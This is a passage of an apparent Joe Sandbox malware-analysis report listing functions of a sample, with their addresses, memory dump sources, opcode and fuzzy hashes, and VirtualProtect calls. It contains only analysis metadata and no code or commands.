                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 847d49a862e83f3c450a6c56030379055bfd9c182e2dc7a5b34ecdc07cb53058
                                                                          • Instruction ID: 774e191aaeff13e537f9dbec094ca35544b3c767b9e0f77404e115f0410cc0e8
                                                                          • Opcode Fuzzy Hash: 847d49a862e83f3c450a6c56030379055bfd9c182e2dc7a5b34ecdc07cb53058
                                                                          • Instruction Fuzzy Hash: 0131E8B2D081249BF7248654DC18BFB7B64FB50318F1682B9E50E96540E67C9FC58AD2
                                                                          Function 0088479C Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: e7815df2dc065e0d45c16e360d812d9dbd0cbe4f3b33cadc7bea38bcc960339b
                                                                          • Instruction ID: bd1ef9c16fc6c187fa9df403fa03dd0330f8d73c48b26767566bafbef7036a3c
                                                                          • Opcode Fuzzy Hash: e7815df2dc065e0d45c16e360d812d9dbd0cbe4f3b33cadc7bea38bcc960339b
                                                                          • Instruction Fuzzy Hash: E23122B2D0522A9FD7249B14CC68AFA7B79FB01304F0011FEE54E96281E3B95EC58F52
                                                                          Function 004A43DB Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 5c420de0f2c638d4862a81fb380890718c1e634e8b696181794fcde16fe03277
                                                                          • Instruction ID: 73cc3fa18bdc6d3f02082728a8b6af9541978f285c0e08f2d4c31626866732aa
                                                                          • Opcode Fuzzy Hash: 5c420de0f2c638d4862a81fb380890718c1e634e8b696181794fcde16fe03277
                                                                          • Instruction Fuzzy Hash: 8E3116B1D092549FEB10CB24DC90AEB7BB8EBD6304F2080FED40996641D67D9FC68B52
                                                                          Function 00884423 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d7d18c14f579e6effa7516fb01f9ea394f8f1dde9167f7fe1aca2fcc900ea643
                                                                          • Instruction ID: 67b4d90b351513ea0e4114ea93b879abe59119faeef5bb121ce071dba1522dca
                                                                          • Opcode Fuzzy Hash: d7d18c14f579e6effa7516fb01f9ea394f8f1dde9167f7fe1aca2fcc900ea643
                                                                          • Instruction Fuzzy Hash: 2E3107B3D0112A6EF7209A14DC49AFBB63DEB41354F1440BEE90DE6180E6B95FC58B92
                                                                          Function 008847CE Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 7ca5bc78045b4d0d9d048d41b94a6cc62a61b9a92af307a51fa670321cf8d543
                                                                          • Instruction ID: 74e271967addb6eace3505c3c7dd5716fea2fb4734c380ebf5750fd4c0da210a
                                                                          • Opcode Fuzzy Hash: 7ca5bc78045b4d0d9d048d41b94a6cc62a61b9a92af307a51fa670321cf8d543
                                                                          • Instruction Fuzzy Hash: EE3146F2D092599FE7149B14CCA4AFA7B79FB40304F0401FED54D96281D2B96AC5CF52
                                                                          Function 00852A2D Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00852B12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: bfd1c7210f71c79d53d09cfc39ff2b6d80358bb089189b69140d3e7f91d366c7
                                                                          • Instruction ID: 5e9a095423f277184991fa78fc0ced27fce0ed9b67f702ae1c627998e6ef464b
                                                                          • Opcode Fuzzy Hash: bfd1c7210f71c79d53d09cfc39ff2b6d80358bb089189b69140d3e7f91d366c7
                                                                          • Instruction Fuzzy Hash: DC31E571D0412C9FDB29DF14CC90AEA7B75FB81315F2081EADD4AAB281CA385EC68F51
                                                                          Function 008841A2 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a5018c06cba4a4c0eedffcf386e1009d4b1dd9c18372fb44097e4b914e5e5db0
                                                                          • Instruction ID: 396977ef5c45202d3d444a5b3b783738e0e517c1735952024baeb9227ddd57a9
                                                                          • Opcode Fuzzy Hash: a5018c06cba4a4c0eedffcf386e1009d4b1dd9c18372fb44097e4b914e5e5db0
                                                                          • Instruction Fuzzy Hash: 5D3108B3D0013A6EF7209A14DC85AF7B63DFB41354F1440BAE90DE6180E6B95FC58B92
                                                                          Function 008841C7 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 230c827c2bcc1451100f71b90fe900ec401267009e270f38d91386909a084351
                                                                          • Instruction ID: 406d6666b366800ec15b3a2d686d5a317fd20c02c441350a10317b61ad7b3102
                                                                          • Opcode Fuzzy Hash: 230c827c2bcc1451100f71b90fe900ec401267009e270f38d91386909a084351
                                                                          • Instruction Fuzzy Hash: 8731F6B3D0113A6EF7209A14DC85AF7B63DFB41354F1440BAE90DA6180E6B95EC58B92
                                                                          Function 00884170 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 051bcc4ba0219d67a7fd8eeea3cad0c3adefdeb032f3e9d937a96177f3bed3b6
                                                                          • Instruction ID: 202273a8e9b0d47d8204487caa72bfecfa2420aef87116b3e540095bfea9dca1
                                                                          • Opcode Fuzzy Hash: 051bcc4ba0219d67a7fd8eeea3cad0c3adefdeb032f3e9d937a96177f3bed3b6
                                                                          • Instruction Fuzzy Hash: 3A3108B3D0013A6EF7209A14DC85AF7B67DFB41354F1440BAE90DE6180E6B95FC58B92
                                                                          Function 00867A99 Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: bf7e5230cc2225699a243706d657f6e632b74cf230570235f6d8b1ffc991af7b
                                                                          • Instruction ID: 4094304c428602170225a891eeb3eb80f507308acb6715806446eae804940a66
                                                                          • Opcode Fuzzy Hash: bf7e5230cc2225699a243706d657f6e632b74cf230570235f6d8b1ffc991af7b
                                                                          • Instruction Fuzzy Hash: 86216DF3C08414ABF7144114EC1DBFB7A28FB91328F1A42B9E90E95580E97C4FC582D2
                                                                          Function 00867A05 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: ccf2598829a3369240b414ca9e1356613373dbdc376e4678dd126e77ff787c41
                                                                          • Instruction ID: de01d74ae848bc4f3757e9f47326cc1e19d1d71e85b9e4b71dc10aa458def387
                                                                          • Opcode Fuzzy Hash: ccf2598829a3369240b414ca9e1356613373dbdc376e4678dd126e77ff787c41
                                                                          • Instruction Fuzzy Hash: 29213CF2D08014ABF7144554EC1CAFB7A28FB90328F1642B9E50E95540E57C9BC58692
                                                                          Function 008453E0 Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: e869e0a98d1f1daf5484f8019fb33690fec603e899e7df32ecb35ac8630fba62
                                                                          • Instruction ID: f8cac51df934313cd700eb4b673b9e46ca9ad0ca05bbd003f8908fbf44f5289f
                                                                          • Opcode Fuzzy Hash: e869e0a98d1f1daf5484f8019fb33690fec603e899e7df32ecb35ac8630fba62
                                                                          • Instruction Fuzzy Hash: 1731D3B2E085586FE7208A54ED54BEF7BB5EBC5310F0841F9E50D9B281D2386E85CE52
                                                                          Function 0083C372 Relevance: 1.6, APIs: 1, Instructions: 91memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0083C498
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886657676.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 0083C000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_83c000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 84879a3934b9d74a6a8fc653b88d7597a876f980107f80e9dc2b7d52b7fc346e
                                                                          • Instruction ID: 232c437fc6f7f957fa43de25209a523d2a0cb9449eb21733cee1449b7a788a21
                                                                          • Opcode Fuzzy Hash: 84879a3934b9d74a6a8fc653b88d7597a876f980107f80e9dc2b7d52b7fc346e
                                                                          • Instruction Fuzzy Hash: 2B31CFB19051689FEB28CB10DC95BFE7739FBC4300F1081FAE50AA6240D6385EC18F95
                                                                          Function 008453EB Relevance: 1.6, APIs: 1, Instructions: 89memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 037960cbb5e869dfc19194279bc94faeffe83382247785357e4bc9fcc3b56088
                                                                          • Instruction ID: 69822767a2e812ec6d95a0ffef9a6ac4c81c793c8134abbcd6d8c0c112320fdb
                                                                          • Opcode Fuzzy Hash: 037960cbb5e869dfc19194279bc94faeffe83382247785357e4bc9fcc3b56088
                                                                          • Instruction Fuzzy Hash: 9D31F4B2E085686FE720CA54EC54BEE7BB5EFD9310F0441F9D50DAB281D6386E818E52
                                                                          Function 0088459D Relevance: 1.6, APIs: 1, Instructions: 88memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 60d7dd2059e88019fee37e967b700d0301887688f6304cc181d448fce9226891
                                                                          • Instruction ID: 36768458c7a5fcc1c1c90ec03d81f5221113e2083688eba971a13383f04ac54a
                                                                          • Opcode Fuzzy Hash: 60d7dd2059e88019fee37e967b700d0301887688f6304cc181d448fce9226891
                                                                          • Instruction Fuzzy Hash: 6631D3F2D045299FE7288A14CC58BFA7779FB40308F0411FED60A96281E7B96AC48F52
                                                                          Function 00845A99 Relevance: 1.6, APIs: 1, Instructions: 86memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: d82eac0d1f590f019583a2221f848b79520e365a740b4189b5cae2ed0d10ba65
                                                                          • Instruction ID: bd229d9db80df69df8b0f7a5409f51821e157a93d67123e7d67332ae74c1c3e1
                                                                          • Opcode Fuzzy Hash: d82eac0d1f590f019583a2221f848b79520e365a740b4189b5cae2ed0d10ba65
                                                                          • Instruction Fuzzy Hash: ED31A1B1E05568AFEB21CB14DC54BEE7BB5EF99310F0441E9D50DA7281D6386F80CE52
                                                                          Function 0089A29B Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: f805768babbab2d46ffab81188c1402197cbe46ab158122426689d43103fc5dd
                                                                          • Instruction ID: c985afb57b85848839efff5cbbcd76f2e79f1e403b7dd3f1ca46c46083b0b69d
                                                                          • Opcode Fuzzy Hash: f805768babbab2d46ffab81188c1402197cbe46ab158122426689d43103fc5dd
                                                                          • Instruction Fuzzy Hash: 4421E4B2D041199FFB188A10DC95BFB7738F791324F1841FED50EA6680E6799EC08E96
                                                                          Function 0083C3D4 Relevance: 1.6, APIs: 1, Instructions: 85memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0083C498
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886657676.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 0083C000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_83c000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c7c64b6eff35db82bfdb0fcb5bdd5844de3a72dccaede2766951d19ac67e5b77
                                                                          • Instruction ID: fa2f5e7e2c5777b4db31eb45f9e1ea56f552fc4be7030fbe414ef0b514a310c7
                                                                          • Opcode Fuzzy Hash: c7c64b6eff35db82bfdb0fcb5bdd5844de3a72dccaede2766951d19ac67e5b77
                                                                          • Instruction Fuzzy Hash: C9317CB19041299BEB64CB14DC95BFE7775FB84310F2082EAE50AA6280DA395EC18F95
                                                                          Function 00845811 Relevance: 1.6, APIs: 1, Instructions: 84memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: a1d7206231dc7d26b070d25920c27dfd1303d2c1c917fb5b100097477ab86d4e
                                                                          • Instruction ID: 1bd81fb2dd509dbb2d8ec2d1d8e75de1986bf0c148e8d3fad2dcafe0f3bff4f5
                                                                          • Opcode Fuzzy Hash: a1d7206231dc7d26b070d25920c27dfd1303d2c1c917fb5b100097477ab86d4e
                                                                          • Instruction Fuzzy Hash: E031CFB2E04168AFEB20CB14DC54BEE7BB5EF89310F0441F9E50DA7241D6386E80CE52
                                                                          Function 00845843 Relevance: 1.6, APIs: 1, Instructions: 84memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: b78fcf0abfa9e745093fad1e912ee680c904a47f8465ced38266b7ce4d06680c
                                                                          • Instruction ID: 7f9e843f9e95bcee2bb8f28ed48b2986318b88b9ae9d59bad9bdbea0c43ccbf2
                                                                          • Opcode Fuzzy Hash: b78fcf0abfa9e745093fad1e912ee680c904a47f8465ced38266b7ce4d06680c
                                                                          • Instruction Fuzzy Hash: 6631BEB2E04168AFEB20CA14DC54BEE7BB5EB99310F0441E9D50DA7241D6386E81CE52
                                                                          Function 00845868 Relevance: 1.6, APIs: 1, Instructions: 84memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: f28729200df5bf10c7e7b44f0e7b6607405c130536026fc8aec0deded24b0992
                                                                          • Instruction ID: 9bfbe79a7884fa21eefaaa5ccc484148dd2da61494d5945b23147c350f8fd347
                                                                          • Opcode Fuzzy Hash: f28729200df5bf10c7e7b44f0e7b6607405c130536026fc8aec0deded24b0992
                                                                          • Instruction Fuzzy Hash: 3931CFB2E05168AFEB20CB14DC54BEE7BB5EF89310F0441F9D50DA7281D6386E80CE52
                                                                          Function 0083C377 Relevance: 1.6, APIs: 1, Instructions: 83memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0083C498
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886657676.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 0083C000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_83c000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c9708e6b3fec5d6fb09e97f991a33cb9b08964264575f01c6996907dd6c7783c
                                                                          • Instruction ID: 2c6d2fd6ae7befc2aa39b9dfd094c69216d9cb8950a0b0efdba8492e03714d62
                                                                          • Opcode Fuzzy Hash: c9708e6b3fec5d6fb09e97f991a33cb9b08964264575f01c6996907dd6c7783c
                                                                          • Instruction Fuzzy Hash: B7318EB19041699FEB688B10DC55BFE7775FBC4311F1081EEE50AA6280D6385EC18F54
                                                                          Function 00899A6D Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 321a2f5eab38c4fd23fb1c812fd9648e40ac3297b8fda3d4e97d73160b6703ce
                                                                          • Instruction ID: 31dd16bf54991ecd86111bd8970f89356ab8fd83d96b7f68d3e4250eec1b6da7
                                                                          • Opcode Fuzzy Hash: 321a2f5eab38c4fd23fb1c812fd9648e40ac3297b8fda3d4e97d73160b6703ce
                                                                          • Instruction Fuzzy Hash: BE217CE2C081189FFB199A28DC59BBB3768FB51318F1D02BED54BD5880E22C9DC48693
                                                                          Function 0085239F Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00852B12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 1929befd7ff3dc4a1189360bf3b296534c39588c068be9bcf6aa9a71aab5f243
                                                                          • Instruction ID: ba28fd6464879dd58b9171fd4f3c4727b71aa6819ca9917db3c91633a9cb5696
                                                                          • Opcode Fuzzy Hash: 1929befd7ff3dc4a1189360bf3b296534c39588c068be9bcf6aa9a71aab5f243
                                                                          • Instruction Fuzzy Hash: 5D212BB2D040189BD7299E10DC55AFA7B74FB41314F1441FEEE0E96280CA386FC68E12
                                                                          Function 00884052 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 80731e1b253fd1dd20df0ff0e27b7c45655b3cfb889f1d2506ef65b8fe701af6
                                                                          • Instruction ID: 31f056ab3d157be5eff60575257a9ebcaded29b1d7890be867223468c9f8ffba
                                                                          • Opcode Fuzzy Hash: 80731e1b253fd1dd20df0ff0e27b7c45655b3cfb889f1d2506ef65b8fe701af6
                                                                          • Instruction Fuzzy Hash: 042132F3D1461A4EE7649A10DC94BF7BB7EFB4130CF1411BEEA0AD5081D6B94AC98B12
                                                                          Function 004A4A13 Relevance: 1.6, APIs: 1, Instructions: 68memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c8edbad5f8d90242286573ef95c96fdacac2e819dd5cb188a8dee553fc27be90
                                                                          • Instruction ID: 831bbebb9d4bed3ab514a97cfd9b775f40a74a3540141abcda50a17d6dbb24d4
                                                                          • Opcode Fuzzy Hash: c8edbad5f8d90242286573ef95c96fdacac2e819dd5cb188a8dee553fc27be90
                                                                          • Instruction Fuzzy Hash: AE2103B2D081189BEB208614DC80AFFB774EBD2305F2481EAD40956240D67D6FC2CF5A
                                                                          Function 00852AC4 Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00852B12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 921f749a85c33fe866a3e209799d986bdf7547ff4ac558622cfe67ee25292639
                                                                          • Instruction ID: 5eecb664afafab3c826b69626070c748b5a75e07d3ee5935a05fcf261c72c72e
                                                                          • Opcode Fuzzy Hash: 921f749a85c33fe866a3e209799d986bdf7547ff4ac558622cfe67ee25292639
                                                                          • Instruction Fuzzy Hash: 9721F976D041289BD729DF14CC94AEA7775FB41315F1081EADE4EAB281CA385E828E51
                                                                          Function 004A49B3 Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 4285c11582544c208a3b82fa451c2a1a10148e029c16aba5f1fa2e7e2fdf8d0f
